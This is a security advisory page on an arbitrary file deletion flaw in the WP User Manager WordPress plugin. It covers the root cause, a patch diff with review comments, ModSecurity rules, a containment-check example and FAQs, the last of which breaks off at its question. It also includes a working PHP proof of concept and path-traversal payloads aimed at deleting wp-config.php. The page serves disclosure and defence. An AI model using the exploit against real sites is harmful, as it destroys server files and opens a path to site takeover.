Analysis

Atomic Edge analysis of CVE-2026-49766:

This vulnerability allows authenticated attackers with Subscriber-level access to delete arbitrary files on the WordPress server. The flaw exists in the WP User Manager plugin version 2.9.16 and earlier, specifically in the file-field handling and user registration components. The CVSS score of 8.1 reflects the high impact of arbitrary file deletion, which can be chained into remote code execution.

Root Cause: The root cause is insufficient validation of the file paths stored in user meta for avatar and cover images. The vulnerable code stores file paths taken from user-controlled POST data without verifying that they lie inside the uploads directory or checking for path traversal sequences. Two places are affected. In `includes/fields/types/class-wpum-field-file.php` (lines 82-108) the posted `current_<field>` value is merged into the upload result with `array_merge()`, so a client that sends the field as an array can supply its own `path` key. In `includes/forms/class-wpum-form-registration.php` (lines 514-600) the resulting `$values['register']['user_avatar']['path']` and `$values['register']['user_cover']['path']` are then written unchanged to the `_current_user_avatar_path` and `_user_cover_path` user meta with `update_user_meta()`. The plugin later uses those stored paths in its file deletion operations without sanitization.

Exploitation: An attacker with Subscriber-level access crafts a POST request, to the WordPress AJAX endpoint or to the registration form, in which the avatar or cover field is an array instead of a URL string, for example `current_user_avatar[path]=../../wp-config.php` or an absolute path such as `current_user_avatar[path]=/var/www/html/wp-config.php`. The plugin stores that value as the image path and deletes the file it points to when the profile is next updated or the account is deleted. The registration handler does verify a nonce before reaching the vulnerable code (the patch comment reads "Nonce already verified above"), but that nonce only guards against CSRF: any user who loads the form receives it, so it is not an obstacle, and no further validation happens between the nonce check and the `update_user_meta()` calls.

Patch Analysis: The patch in version 2.9.17 adds three layers of protection. First, it rejects array values for the `current_user_avatar` and `current_user_cover` POST fields with an `is_array()` check, in both the field class and the registration handler. Second, it requires stored paths to begin with the WordPress uploads directory: `0 === strpos( $cover_path, $upload_dir )`. Third, it rejects paths containing the `..` traversal sequence: `false === strpos( $cover_path, '..' )`. It also passes the URL values through `esc_url_raw()` before storing them. The key change is in `class-wpum-form-registration.php` lines 577-600, where the two path checks gate both the `carbon_set_user_meta()` and the `update_user_meta()` calls; if either check fails, neither the URL nor the path is stored.

Impact: Successful exploitation lets an attacker delete arbitrary files on the WordPress server, subject to the filesystem permissions of the web server user. Deleting `wp-config.php` takes the site down and exposes the WordPress installer, which can let the attacker reinstall WordPress with credentials and a database they control. Deleting `.htaccess` removes any access restrictions enforced there. Deleting files that belong to security plugins or to the site itself disables protections or breaks functionality. Because the attacker chooses which file is deleted, several routes to remote code execution or complete site takeover are available.

Proof of concept (PHP)

<?php
// Atomic Edge CVE Research – Proof of Concept
// CVE-2026-49766 – WP User Manager – User Profile Builder & Membership <= 2.9.16
// [The lines defining $target_url, $login_url, $username and $password, and the
//  first key of $login_data, were lost when this page was extracted and are not
//  reproduced here; set those four variables before running.]
$login_data = [
    /* key lost in extraction */ $username,
    'pwd'        => $password,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log In'
];

// Step 1: log in as the low-privileged (Subscriber) user and keep the session cookie
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);

// Step 2: Exploit the arbitrary file deletion via profile update
// We will send a POST request to admin-ajax.php with the vulnerable action.
// http_build_query() encodes the nested array as current_user_avatar[path]=...,
// which PHP turns back into an array on the server side.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$payload = [
    'action'              => 'wpum_update_profile',
    'current_user_avatar' => ['path' => '/var/www/html/wp-config.php']
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0); // body only, so the success check below is not confused by headers
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);

// Step 3: Check if the file deletion was successful
if (strpos($response, 'success') !== false) {
    echo "[+] Exploit sent successfully. Check if wp-config.php was deleted.\n";
} else {
    echo "[-] Exploit failed. The target may be patched or the attack vector differs.\n";
    echo "Response: " . substr($response, 0, 500) . "\n";
}

curl_close($ch);
?>

ModSecurity rule

# Atomic Edge WAF Rule – CVE-2026-49766
# Blocks path traversal and absolute-path payloads in the current_user_avatar and
# current_user_cover POST fields. The same field names are posted by the
# admin-ajax.php profile update and by the front-end registration form, so the
# rules are not restricted to /wp-admin/admin-ajax.php.
# t:normalizePath is deliberately not used: it would collapse
# "uploads/../wp-config.php" to "wp-config.php" before the regex runs.

# ".." anywhere, a leading "/" or a Windows drive letter in either field
SecRule ARGS_POST:/^current_user_avatar/|ARGS_POST:/^current_user_cover/ "@rx \.\.|^/|^[A-Za-z]:" \
    "id:20261994,phase:2,deny,status:403,t:none,t:urlDecodeUni,t:removeNulls,\
    msg:'CVE-2026-49766 - WP User Manager Arbitrary File Deletion (path injection)',\
    severity:'CRITICAL',tag:'CVE-2026-49766'"

# Mirror of the 2.9.17 fix: the plugin accepts only a scalar URL string for these
# fields, so any array-shaped parameter (current_user_avatar[path]=...) is rejected
SecRule ARGS_POST_NAMES "@rx ^current_user_(?:avatar|cover)\[" \
    "id:20261995,phase:2,deny,status:403,t:none,\
    msg:'CVE-2026-49766 - WP User Manager Arbitrary File Deletion (array-valued avatar/cover field)',\
    severity:'CRITICAL',tag:'CVE-2026-49766'"
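To make the patch's check concrete and show one way it can be tightened, here is an added example that is not code from the plugin or from the Atomic Edge analysis. It contrasts the 2.9.17 prefix-plus-`..` test with a `realpath()`-based containment check. The function names, the temporary directory layout and the sample paths are all constructed for the demonstration, and `$upload_dir` stands in for what WordPress supplies as `wp_upload_dir()['basedir']`.

```php
<?php
// Added example (not WP User Manager code): containment check for a stored
// avatar/cover path, next to the prefix/".." test used in the 2.9.17 fix.
// Assumption: the uploads base directory is passed in explicitly; in WordPress
// it would be wp_upload_dir()['basedir']. Files are created in a temp dir so
// the script runs outside WordPress.
declare(strict_types=1);

// The check as applied in 2.9.17: no ".." anywhere and a bare prefix match.
function wpum_patch_style_check(string $path, string $upload_dir): bool
{
    return $path !== ''
        && false === strpos($path, '..')
        && 0 === strpos($path, $upload_dir);
}

// Stricter containment: resolve both sides with realpath() so symlinks, "."
// segments and duplicate separators disappear, require a regular file, and
// require the resolved path to sit strictly below the resolved uploads
// directory. The trailing separator stops "uploads-old/x" from matching "uploads".
function is_path_inside_uploads(string $path, string $upload_dir): bool
{
    $real_dir  = realpath($upload_dir);
    $real_path = realpath($path);
    if ($real_dir === false || $real_path === false || !is_file($real_path)) {
        // A path that does not resolve to an existing file cannot be the
        // avatar the plugin just wrote to disk, so reject it.
        return false;
    }
    $real_dir .= DIRECTORY_SEPARATOR;
    return 0 === strncmp($real_path, $real_dir, strlen($real_dir));
}

// --- constructed directory layout for the demonstration ---
$base    = sys_get_temp_dir() . '/wpum-demo-' . getmypid();
$uploads = $base . '/uploads';
mkdir($uploads . '/2026', 0700, true);
mkdir($base . '/uploads-old', 0700);
file_put_contents($uploads . '/2026/avatar.png', 'png');
file_put_contents($base . '/uploads-old/secret.txt', 'x');
file_put_contents($base . '/wp-config.php', '<?php // secrets');

$cases = [
    'legitimate upload'     => $uploads . '/2026/avatar.png',
    'traversal'             => $uploads . '/../wp-config.php',
    'absolute path'         => $base . '/wp-config.php',
    'sibling prefix bypass' => $base . '/uploads-old/secret.txt',
];

printf("%-24s %-12s %s\n", 'case', 'patch-check', 'realpath-check');
foreach ($cases as $label => $candidate) {
    printf("%-24s %-12s %s\n", $label,
        wpum_patch_style_check($candidate, $uploads) ? 'allow' : 'reject',
        is_path_inside_uploads($candidate, $uploads)  ? 'allow' : 'reject');
}

// cleanup
foreach (['/uploads/2026/avatar.png', '/uploads-old/secret.txt', '/wp-config.php'] as $f) {
    unlink($base . $f);
}
rmdir($uploads . '/2026');
rmdir($uploads);
rmdir($base . '/uploads-old');
rmdir($base);
```

Run it with `php containment-demo.php`. The legitimate upload passes both checks, the traversal and absolute-path cases fail both, and the `uploads-old` sibling passes the patch-style prefix test but fails the `realpath()` test. That sibling case is a robustness point rather than a demonstrated exploit against this plugin, since it only matters when such a directory exists beside `uploads`, but appending the separator before comparing costs nothing. Treating a non-existent file as a rejection is acceptable here because the only legitimate value at this point is a file the plugin has just written.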

CVE-2026-49766: WP User Manager – User Profile Builder & Membership <= 2.9.16 Authenticated (Subscriber+) Arbitrary File Deletion PoC, Patch Analysis & Rule
CVE: CVE-2026-49766
Plugin slug: wp-user-manager
Affected version: 2.9.16 and earlier
Patched version: 2.9.17
Analysis Overview
Diff between vulnerable and patched code
Below is a diff between the unpatched vulnerable code and the patched update, for reference.
--- a/wp-user-manager/includes/fields/types/class-wpum-field-file.php
+++ b/wp-user-manager/includes/fields/types/class-wpum-field-file.php
@@ -82,8 +82,20 @@
$file = $this->upload_file( $key, $field );
if ( ! $file ) {
$file = parent::get_posted_field( 'current_' . $key, $field );
+ // Reject array values from POST — only scalar (string URL) is valid.
+ if ( is_array( $file ) ) {
+ $file = '';
+ }
} elseif ( is_array( $file ) ) {
- $file = array_filter( array_merge( $file, (array) parent::get_posted_field( 'current_' . $key, $field ) ) );
+ $current = parent::get_posted_field( 'current_' . $key, $field );
+ // Only merge scalar (string) current values. Array values from POST
+ // could inject arbitrary paths — reject them silently.
+ if ( is_array( $current ) ) {
+ $current = '';
+ }
+ if ( $current ) {
+ $file = array_filter( array_merge( $file, array( 'url' => $current ) ) );
+ }
}
return $file;
}
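Review bot: the scalar `$current` taken from POST on the `elseif` branch is still user-controlled and is written into `url` without any check that it refers to the uploads directory, and because `array_merge()` lets the later array win it replaces the `url` of the file that was just uploaded in `$file`. Consider validating it the same way the registration form now validates `path` (uploads-directory prefix, no `..`) or ignoring it when an upload succeeded. It would also help to document why an array from POST is dropped silently here (`$file = '';`) while class-wpum-form-registration.php throws `Invalid input.` for the same condition.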
--- a/wp-user-manager/includes/forms/class-wpum-form-registration.php
+++ b/wp-user-manager/includes/forms/class-wpum-form-registration.php
@@ -514,6 +514,11 @@
return false;
}
+ // Security: reject array values for avatar/cover POST fields to prevent path injection.
+ if ( ( isset( $_POST['current_user_avatar'] ) && is_array( $_POST['current_user_avatar'] ) ) || ( isset( $_POST['current_user_cover'] ) && is_array( $_POST['current_user_cover'] ) ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Missing -- Nonce already verified above.
+ throw new Exception( esc_html__( 'Invalid input.', 'wp-user-manager' ) );
+ }
+
$return = $this->validate_fields( $values );
if ( is_wp_error( $return ) ) {
throw new Exception( $return->get_error_message() );
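Review bot: the array check is keyed to the two hard-coded names `current_user_avatar` and `current_user_cover`, so any other file-type field placed on the registration form is covered only by the generic guard in class-wpum-field-file.php; a one-line comment stating that the two checks are intentionally redundant would help the next reader. The long condition would also read better as a loop over `array( 'current_user_avatar', 'current_user_cover' )` with the `isset()`/`is_array()` test applied per key.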
@@ -572,14 +577,24 @@
$user->set_role( $this->role );
}
+ $upload_dir = wp_upload_dir()['basedir'];
+
if ( isset( $values['register']['user_cover']['url'] ) ) {
- carbon_set_user_meta( $user->ID, 'user_cover', $values['register']['user_cover']['url'] );
- update_user_meta( $user->ID, '_user_cover_path', $values['register']['user_cover']['path'] );
+ $cover_path = $values['register']['user_cover']['path'] ?? '';
+ // Only store path if it is within the uploads directory and contains no traversal.
+ if ( $cover_path && false === strpos( $cover_path, '..' ) && 0 === strpos( $cover_path, $upload_dir ) ) {
+ carbon_set_user_meta( $user->ID, 'user_cover', esc_url_raw( $values['register']['user_cover']['url'] ) );
+ update_user_meta( $user->ID, '_user_cover_path', $cover_path );
+ }
}
if ( isset( $values['register']['user_avatar']['url'] ) ) {
- carbon_set_user_meta( $user->ID, 'current_user_avatar', $values['register']['user_avatar']['url'] );
- update_user_meta( $user->ID, '_current_user_avatar_path', $values['register']['user_avatar']['path'] );
+ $avatar_path = $values['register']['user_avatar']['path'] ?? '';
+ // Only store path if it is within the uploads directory and contains no traversal.
+ if ( $avatar_path && false === strpos( $avatar_path, '..' ) && 0 === strpos( $avatar_path, $upload_dir ) ) {
+ carbon_set_user_meta( $user->ID, 'current_user_avatar', esc_url_raw( $values['register']['user_avatar']['url'] ) );
+ update_user_meta( $user->ID, '_current_user_avatar_path', $avatar_path );
+ }
}
// Allow developers to extend signup process.
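Review bot: `0 === strpos( $cover_path, $upload_dir )` is a bare prefix test and `$upload_dir` carries no trailing separator, so a sibling directory whose name starts with `uploads` (for example `uploads-old/secret.txt`) passes; compare against `trailingslashit( $upload_dir )`, or better against `realpath()` of both sides, which also neutralises symlinks and repeated separators. On Windows hosts `wp_upload_dir()['basedir']` can contain backslashes while the posted path uses forward slashes, so run both through `wp_normalize_path()` before comparing. Finally, the same pair of `carbon_set_user_meta()`/`update_user_meta()` calls presumably exists in the account/profile update form, which this diff does not touch, and the PoC on this page goes through the profile update action; confirm that handler received the same validation.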
--- a/wp-user-manager/vendor-dist/composer/installed.php
+++ b/wp-user-manager/vendor-dist/composer/installed.php
@@ -2,4 +2,4 @@
namespace WPUM;
-return array('root' => array('name' => 'wp-user-manager/wp-user-manager', 'pretty_version' => 'v2.9.16', 'version' => '2.9.16.0', 'reference' => '161a2f39734f40fa1ce544921baea8fb8b6c8793', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev' => false), 'versions' => array('brain/cortex' => array('pretty_version' => 'dev-refactoring-fastroute', 'version' => 'dev-refactoring-fastroute', 'reference' => '86bec053ec2c4d2e4c75af64e0cee951d9b0054b', 'type' => 'library', 'install_path' => __DIR__ . '/../brain/cortex', 'aliases' => array(0 => '9999999-dev'), 'dev_requirement' => false), 'composer/installers' => array('pretty_version' => '1.x-dev', 'version' => '1.9999999.9999999.9999999-dev', 'reference' => 'd20a64ed3c94748397ff5973488761b22f6d3f19', 'type' => 'composer-plugin', 'install_path' => __DIR__ . '/./installers', 'aliases' => array(), 'dev_requirement' => false), 'dompdf/dompdf' => array('pretty_version' => 'v2.0.2', 'version' => '2.0.2.0', 'reference' => 'ad4c631bf8897fc1ca7b566468a969cfd71a558a', 'type' => 'library', 'install_path' => __DIR__ . '/../dompdf/dompdf', 'aliases' => array(), 'dev_requirement' => false), 'gamajo/template-loader' => array('pretty_version' => '1.3.1', 'version' => '1.3.1.0', 'reference' => 'fa92a37b780d945463f7fea328dce14933558752', 'type' => 'library', 'install_path' => __DIR__ . '/../gamajo/template-loader', 'aliases' => array(), 'dev_requirement' => false), 'htmlburger/carbon-fields' => array('pretty_version' => 'v3.6.9', 'version' => '3.6.9.0', 'reference' => 'f82e80e3e3469d6e86cc17a8950b918ad448a059', 'type' => 'library', 'install_path' => __DIR__ . '/../htmlburger/carbon-fields', 'aliases' => array(), 'dev_requirement' => false), 'masterminds/html5' => array('pretty_version' => '2.7.6', 'version' => '2.7.6.0', 'reference' => '897eb517a343a2281f11bc5556d6548db7d93947', 'type' => 'library', 'install_path' => __DIR__ . 
'/../masterminds/html5', 'aliases' => array(), 'dev_requirement' => false), 'nesbot/carbon' => array('pretty_version' => '2.66.0', 'version' => '2.66.0.0', 'reference' => '496712849902241f04902033b0441b269effe001', 'type' => 'library', 'install_path' => __DIR__ . '/../nesbot/carbon', 'aliases' => array(), 'dev_requirement' => false), 'nikic/fast-route' => array('pretty_version' => 'v0.7.0', 'version' => '0.7.0.0', 'reference' => '8164b4a0d8afde4eae5f1bfc39084972ba23ad36', 'type' => 'library', 'install_path' => __DIR__ . '/../nikic/fast-route', 'aliases' => array(), 'dev_requirement' => false), 'phenx/php-font-lib' => array('pretty_version' => '0.5.4', 'version' => '0.5.4.0', 'reference' => 'dd448ad1ce34c63d09baccd05415e361300c35b4', 'type' => 'library', 'install_path' => __DIR__ . '/../phenx/php-font-lib', 'aliases' => array(), 'dev_requirement' => false), 'phenx/php-svg-lib' => array('pretty_version' => '0.5.0', 'version' => '0.5.0.0', 'reference' => '76876c6cf3080bcb6f249d7d59705108166a6685', 'type' => 'library', 'install_path' => __DIR__ . '/../phenx/php-svg-lib', 'aliases' => array(), 'dev_requirement' => false), 'psr/http-message' => array('pretty_version' => '1.0.1', 'version' => '1.0.1.0', 'reference' => 'f6561bf28d520154e4b0ec72be95418abe6d9363', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/http-message', 'aliases' => array(), 'dev_requirement' => false), 'roundcube/plugin-installer' => array('dev_requirement' => false, 'replaced' => array(0 => '*')), 'sabberworm/php-css-parser' => array('pretty_version' => '8.4.0', 'version' => '8.4.0.0', 'reference' => 'e41d2140031d533348b2192a83f02d8dd8a71d30', 'type' => 'library', 'install_path' => __DIR__ . 
'/../sabberworm/php-css-parser', 'aliases' => array(), 'dev_requirement' => false), 'shama/baton' => array('dev_requirement' => false, 'replaced' => array(0 => '*')), 'stripe/stripe-php' => array('pretty_version' => 'v10.5.0', 'version' => '10.5.0.0', 'reference' => '331415b232d60d7c0449de7bde4cb7d4fedf982e', 'type' => 'library', 'install_path' => __DIR__ . '/../stripe/stripe-php', 'aliases' => array(), 'dev_requirement' => false), 'symfony/deprecation-contracts' => array('pretty_version' => 'v2.5.2', 'version' => '2.5.2.0', 'reference' => 'e8b495ea28c1d97b5e0c121748d6f9b53d075c66', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/deprecation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-mbstring' => array('pretty_version' => 'v1.26.0', 'version' => '1.26.0.0', 'reference' => '9344f9cb97f3b19424af1a21a3b0e75b0a7d8d7e', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-mbstring', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-php80' => array('pretty_version' => 'v1.26.0', 'version' => '1.26.0.0', 'reference' => 'cfa0ae98841b9e461207c13ab093d76b0fa7bace', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-php80', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation' => array('pretty_version' => 'v5.4.11', 'version' => '5.4.11.0', 'reference' => '7a1a8f6bbff269f434a83343a0a5d36a4f8cfa21', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-contracts' => array('pretty_version' => 'v2.5.2', 'version' => '2.5.2.0', 'reference' => '136b19dd05cdf0709db6537d058bcab6dd6e2dbe', 'type' => 'library', 'install_path' => __DIR__ . 
'/../symfony/translation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '2.3')), 'wearerequired/wp-requirements-check' => array('pretty_version' => '1.1.0', 'version' => '1.1.0.0', 'reference' => '82b8a6c4b953f59e7e534df2d4287e34af950812', 'type' => 'library', 'install_path' => __DIR__ . '/../wearerequired/wp-requirements-check', 'aliases' => array(), 'dev_requirement' => false), 'wp-user-manager/wp-notices' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '5498f209c6667e88e944194a93a50f9ffc25ea24', 'type' => 'library', 'install_path' => __DIR__ . '/../wp-user-manager/wp-notices', 'aliases' => array(0 => '9999999-dev'), 'dev_requirement' => false), 'wp-user-manager/wp-optionskit' => array('pretty_version' => '1.1.2', 'version' => '1.1.2.0', 'reference' => '6253bda447991733bf8e19cb2123b41c666f3d62', 'type' => 'library', 'install_path' => __DIR__ . '/../wp-user-manager/wp-optionskit', 'aliases' => array(), 'dev_requirement' => false), 'wp-user-manager/wp-user-manager' => array('pretty_version' => 'v2.9.16', 'version' => '2.9.16.0', 'reference' => '161a2f39734f40fa1ce544921baea8fb8b6c8793', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev_requirement' => false), 'wp-user-manager/wpum-blocks' => array('pretty_version' => '1.15', 'version' => '1.15.0.0', 'reference' => 'fc3d01fe0baa2fb0fdf6a0f4cff30fc40bb1dbba', 'type' => 'library', 'install_path' => __DIR__ . '/../wp-user-manager/wpum-blocks', 'aliases' => array(), 'dev_requirement' => false), 'wpbp/widgets-helper' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '5547acaaf60b856b0025cdf44e3831e0f3202929', 'type' => 'library', 'install_path' => __DIR__ . '/../wpbp/widgets-helper', 'aliases' => array(), 'dev_requirement' => false)));
+return array('root' => array('name' => 'wp-user-manager/wp-user-manager', 'pretty_version' => 'v2.9.17', 'version' => '2.9.17.0', 'reference' => 'b10a593d26911a6b552c45451662e436ce778bd0', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev' => false), 'versions' => array('brain/cortex' => array('pretty_version' => 'dev-refactoring-fastroute', 'version' => 'dev-refactoring-fastroute', 'reference' => '86bec053ec2c4d2e4c75af64e0cee951d9b0054b', 'type' => 'library', 'install_path' => __DIR__ . '/../brain/cortex', 'aliases' => array(0 => '9999999-dev'), 'dev_requirement' => false), 'composer/installers' => array('pretty_version' => '1.x-dev', 'version' => '1.9999999.9999999.9999999-dev', 'reference' => 'd20a64ed3c94748397ff5973488761b22f6d3f19', 'type' => 'composer-plugin', 'install_path' => __DIR__ . '/./installers', 'aliases' => array(), 'dev_requirement' => false), 'dompdf/dompdf' => array('pretty_version' => 'v2.0.2', 'version' => '2.0.2.0', 'reference' => 'ad4c631bf8897fc1ca7b566468a969cfd71a558a', 'type' => 'library', 'install_path' => __DIR__ . '/../dompdf/dompdf', 'aliases' => array(), 'dev_requirement' => false), 'gamajo/template-loader' => array('pretty_version' => '1.3.1', 'version' => '1.3.1.0', 'reference' => 'fa92a37b780d945463f7fea328dce14933558752', 'type' => 'library', 'install_path' => __DIR__ . '/../gamajo/template-loader', 'aliases' => array(), 'dev_requirement' => false), 'htmlburger/carbon-fields' => array('pretty_version' => 'v3.6.9', 'version' => '3.6.9.0', 'reference' => 'f82e80e3e3469d6e86cc17a8950b918ad448a059', 'type' => 'library', 'install_path' => __DIR__ . '/../htmlburger/carbon-fields', 'aliases' => array(), 'dev_requirement' => false), 'masterminds/html5' => array('pretty_version' => '2.7.6', 'version' => '2.7.6.0', 'reference' => '897eb517a343a2281f11bc5556d6548db7d93947', 'type' => 'library', 'install_path' => __DIR__ . 
'/../masterminds/html5', 'aliases' => array(), 'dev_requirement' => false), 'nesbot/carbon' => array('pretty_version' => '2.66.0', 'version' => '2.66.0.0', 'reference' => '496712849902241f04902033b0441b269effe001', 'type' => 'library', 'install_path' => __DIR__ . '/../nesbot/carbon', 'aliases' => array(), 'dev_requirement' => false), 'nikic/fast-route' => array('pretty_version' => 'v0.7.0', 'version' => '0.7.0.0', 'reference' => '8164b4a0d8afde4eae5f1bfc39084972ba23ad36', 'type' => 'library', 'install_path' => __DIR__ . '/../nikic/fast-route', 'aliases' => array(), 'dev_requirement' => false), 'phenx/php-font-lib' => array('pretty_version' => '0.5.4', 'version' => '0.5.4.0', 'reference' => 'dd448ad1ce34c63d09baccd05415e361300c35b4', 'type' => 'library', 'install_path' => __DIR__ . '/../phenx/php-font-lib', 'aliases' => array(), 'dev_requirement' => false), 'phenx/php-svg-lib' => array('pretty_version' => '0.5.0', 'version' => '0.5.0.0', 'reference' => '76876c6cf3080bcb6f249d7d59705108166a6685', 'type' => 'library', 'install_path' => __DIR__ . '/../phenx/php-svg-lib', 'aliases' => array(), 'dev_requirement' => false), 'psr/http-message' => array('pretty_version' => '1.0.1', 'version' => '1.0.1.0', 'reference' => 'f6561bf28d520154e4b0ec72be95418abe6d9363', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/http-message', 'aliases' => array(), 'dev_requirement' => false), 'roundcube/plugin-installer' => array('dev_requirement' => false, 'replaced' => array(0 => '*')), 'sabberworm/php-css-parser' => array('pretty_version' => '8.4.0', 'version' => '8.4.0.0', 'reference' => 'e41d2140031d533348b2192a83f02d8dd8a71d30', 'type' => 'library', 'install_path' => __DIR__ . 
'/../sabberworm/php-css-parser', 'aliases' => array(), 'dev_requirement' => false), 'shama/baton' => array('dev_requirement' => false, 'replaced' => array(0 => '*')), 'stripe/stripe-php' => array('pretty_version' => 'v10.5.0', 'version' => '10.5.0.0', 'reference' => '331415b232d60d7c0449de7bde4cb7d4fedf982e', 'type' => 'library', 'install_path' => __DIR__ . '/../stripe/stripe-php', 'aliases' => array(), 'dev_requirement' => false), 'symfony/deprecation-contracts' => array('pretty_version' => 'v2.5.2', 'version' => '2.5.2.0', 'reference' => 'e8b495ea28c1d97b5e0c121748d6f9b53d075c66', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/deprecation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-mbstring' => array('pretty_version' => 'v1.26.0', 'version' => '1.26.0.0', 'reference' => '9344f9cb97f3b19424af1a21a3b0e75b0a7d8d7e', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-mbstring', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-php80' => array('pretty_version' => 'v1.26.0', 'version' => '1.26.0.0', 'reference' => 'cfa0ae98841b9e461207c13ab093d76b0fa7bace', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-php80', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation' => array('pretty_version' => 'v5.4.11', 'version' => '5.4.11.0', 'reference' => '7a1a8f6bbff269f434a83343a0a5d36a4f8cfa21', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-contracts' => array('pretty_version' => 'v2.5.2', 'version' => '2.5.2.0', 'reference' => '136b19dd05cdf0709db6537d058bcab6dd6e2dbe', 'type' => 'library', 'install_path' => __DIR__ . 
'/../symfony/translation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '2.3')), 'wearerequired/wp-requirements-check' => array('pretty_version' => '1.1.0', 'version' => '1.1.0.0', 'reference' => '82b8a6c4b953f59e7e534df2d4287e34af950812', 'type' => 'library', 'install_path' => __DIR__ . '/../wearerequired/wp-requirements-check', 'aliases' => array(), 'dev_requirement' => false), 'wp-user-manager/wp-notices' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '5498f209c6667e88e944194a93a50f9ffc25ea24', 'type' => 'library', 'install_path' => __DIR__ . '/../wp-user-manager/wp-notices', 'aliases' => array(0 => '9999999-dev'), 'dev_requirement' => false), 'wp-user-manager/wp-optionskit' => array('pretty_version' => '1.1.2', 'version' => '1.1.2.0', 'reference' => '6253bda447991733bf8e19cb2123b41c666f3d62', 'type' => 'library', 'install_path' => __DIR__ . '/../wp-user-manager/wp-optionskit', 'aliases' => array(), 'dev_requirement' => false), 'wp-user-manager/wp-user-manager' => array('pretty_version' => 'v2.9.17', 'version' => '2.9.17.0', 'reference' => 'b10a593d26911a6b552c45451662e436ce778bd0', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev_requirement' => false), 'wp-user-manager/wpum-blocks' => array('pretty_version' => '1.15', 'version' => '1.15.0.0', 'reference' => 'fc3d01fe0baa2fb0fdf6a0f4cff30fc40bb1dbba', 'type' => 'library', 'install_path' => __DIR__ . '/../wp-user-manager/wpum-blocks', 'aliases' => array(), 'dev_requirement' => false), 'wpbp/widgets-helper' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '5547acaaf60b856b0025cdf44e3831e0f3202929', 'type' => 'library', 'install_path' => __DIR__ . '/../wpbp/widgets-helper', 'aliases' => array(), 'dev_requirement' => false)));
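Review bot: this is Composer's generated installed.php and the only change is the root package's `pretty_version`, `version` and `reference`; no dependency version moved, so there is nothing to review beyond confirming the file was regenerated by Composer rather than hand-edited (the new `reference` hash should match the release commit).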
--- a/wp-user-manager/wp-user-manager.php
+++ b/wp-user-manager/wp-user-manager.php
@@ -3,7 +3,7 @@
* Plugin Name: WP User Manager
* Plugin URI: https://wpusermanager.com
* Description: Beautifully simple user profile directories with frontend login, registration and account customization. WP User Manager is the best solution to manage your community and your users for WordPress.
- * Version: 2.9.16
+ * Version: 2.9.17
* Requires PHP: 7.4
* Author: WP User Manager
* Author URI: https://wpusermanager.com
@@ -21,7 +21,7 @@
function WPUM() {
require_once __DIR__ . '/includes/class-wp-user-manager.php';
- return WP_User_Manager::instance( __FILE__, '2.9.16' );
+ return WP_User_Manager::instance( __FILE__, '2.9.17' );
}
WPUM();
Frequently Asked Questions
What is CVE-2026-49766?
Overview of the vulnerability: CVE-2026-49766 is a high-severity vulnerability in the WP User Manager plugin for WordPress, affecting versions up to and including 2.9.16. It allows authenticated users with Subscriber-level access and above to delete arbitrary files on the server because the file paths supplied with the avatar and cover fields are stored without validation.
How does this vulnerability work?
Mechanism of exploitation: The plugin stores the `path` value of a user-supplied avatar or cover field in user meta without checking that it points inside the uploads directory. An attacker posts a crafted value such as `../../wp-config.php`, and when the plugin later removes the "old" image it deletes whatever that path points to.
Who is affected by this vulnerability?
Identifying vulnerable users: Any WordPress site running WP User Manager 2.9.16 or earlier is affected. Any authenticated user with Subscriber-level access or higher can exploit it, so sites that allow open registration (which the plugin's registration form provides) are the most exposed.
How can I check if my site is vulnerable?
Steps to identify vulnerability: Check the installed version of WP User Manager (the Version header in wp-user-manager.php, or the Plugins screen). If it is 2.9.16 or earlier, the site is vulnerable. Then establish whether untrusted people can hold accounts: open registration, or existing Subscriber-level users you do not control.
What steps should I take to fix this vulnerability?
